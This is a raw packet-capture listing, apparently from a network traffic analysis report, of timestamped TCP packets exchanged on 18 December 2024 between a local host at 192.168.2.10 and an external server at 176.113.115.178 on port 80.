                                                        Dec 18, 2024 14:08:30.668092966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.668152094 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.668941975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.669298887 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.669352055 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.670090914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.670229912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.670279026 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.671288013 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.671354055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.671521902 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.672353029 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.672364950 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.672466040 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.673202991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.673324108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.674519062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.674530983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.674650908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.674650908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.675235033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.675249100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.675348997 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.676233053 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.676255941 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.676364899 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.677206993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.677376032 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.678544998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.678558111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.678688049 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.679378033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.679394007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.679452896 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.680356979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.680423021 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.680505037 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.681387901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.681569099 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.681646109 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.682502985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.682640076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.682724953 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.683485031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.683787107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.684309006 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.684602976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.684743881 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.685621977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.685674906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.685702085 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.685913086 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.686547995 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.687056065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.687135935 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.687756062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.687767982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.687813044 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.688571930 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.688627958 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.688703060 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.689573050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.689795017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.689898014 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.690702915 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.690947056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.691787004 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.691800117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.691889048 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.691889048 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.692790985 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.692810059 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.692882061 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.693867922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.693881035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.693947077 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.694767952 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.694926977 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.694977045 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.696041107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.696068048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.696147919 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.696938992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.696950912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.697000980 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.698003054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.698024035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.698282003 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.698956966 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.699068069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.699225903 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.699958086 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.700011015 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.700294018 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.701107979 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.701349020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.701451063 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.702431917 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.702462912 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.702609062 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.703347921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.703372955 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.703485012 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.704327106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.704339981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.704534054 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.705308914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.705322981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.705368042 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.706279993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.706293106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.706337929 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.707334042 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.707348108 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.707448006 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.708201885 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.708486080 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.708561897 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.709309101 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.709412098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.709661007 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.710282087 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.710294008 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.710345030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.711355925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.711880922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.711985111 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.712399960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.712454081 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.712873936 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.713460922 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.713474035 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.713514090 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.714340925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.714531898 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.714611053 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.715737104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.715882063 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.715971947 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.716793060 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.716939926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.717300892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.717627048 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.717772007 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.719058990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.728631973 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.728727102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.728799105 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.729152918 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.729271889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.729325056 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.729456902 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.730374098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.730667114 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.730746031 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.731370926 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.733582973 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.846432924 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.846658945 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.846781015 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.847117901 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.847131014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.847142935 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.847244978 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.848217964 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.848237991 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.849159002 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.849173069 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.849208117 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.849550962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.850116014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.850128889 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.850322962 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.850724936 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.850744009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.850786924 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.851360083 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.851490974 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.851617098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.852193117 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.852205992 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.852272034 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.853128910 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.853146076 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.853208065 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.853852034 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.853864908 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.853914976 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.854553938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.854856014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.855043888 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.855488062 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.855580091 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.855674028 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.856290102 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.856519938 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.856549025 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.857223988 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.857235909 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.858011961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.858023882 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.858067036 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.858067036 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.858843088 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.858855963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.858899117 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.859679937 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.859693050 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.859766960 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.860450983 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.860513926 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.860763073 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.861335039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.861354113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.861463070 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.862345934 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.862364054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.862559080 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.862922907 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.863145113 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.863346100 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.863960981 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.863980055 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.864083052 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.864845037 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.864859104 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.865093946 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.865421057 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.865662098 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.865745068 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.866626024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.866638899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.867259979 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.867285013 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.867297888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.867337942 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.867981911 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.867995024 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.868324995 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.868807077 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.868855953 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.869237900 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.869594097 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.869674921 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.869765043 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.870539904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.870553017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.871332884 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.871336937 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.871362925 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.871445894 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.872119904 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.872232914 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.872282982 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.873172998 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.873186111 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.873238087 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.874135017 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.874149084 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.874211073 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.874670982 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.874722958 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.874814987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.875427961 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.875536919 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.875694990 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.876271963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.876324892 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.876394033 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.877154112 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.877278090 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.877348900 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.877971888 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.877989054 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.878031969 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.878751993 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.879146099 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.879178047 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.879645109 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.879700899 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.879777908 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.880753040 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.880767107 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.880860090 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.881345987 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.881469965 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.881623030 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.882380009 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.882392883 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.882467031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.883002043 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.883141041 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.883336067 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.884445906 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.884458065 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.885008097 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.885452986 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.885471106 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.885595083 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.885679960 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.885787010 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.885962963 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.886600971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.886739016 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.886841059 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.887355089 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.887687922 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.887820005 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.920768976 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.920794010 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.921020031 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.921206951 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.921219110 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.921725988 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.922017097 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.922029972 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.922271013 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:30.922808886 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:30.922899008 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.038592100 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.038604975 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.038803101 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.039006948 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.039359093 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.040009022 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.040020943 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.040776014 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.040795088 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.041004896 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.041301966 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.041656971 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.041728020 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.042679071 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.042690039 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.042742968 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.043360949 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.043405056 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.043467999 CET4974680192.168.2.10176.113.115.178
                                                        Dec 18, 2024 14:08:31.044101000 CET8049746176.113.115.178192.168.2.10
                                                        Dec 18, 2024 14:08:31.044264078 CET8049746176.113.115.178192.168.2.10
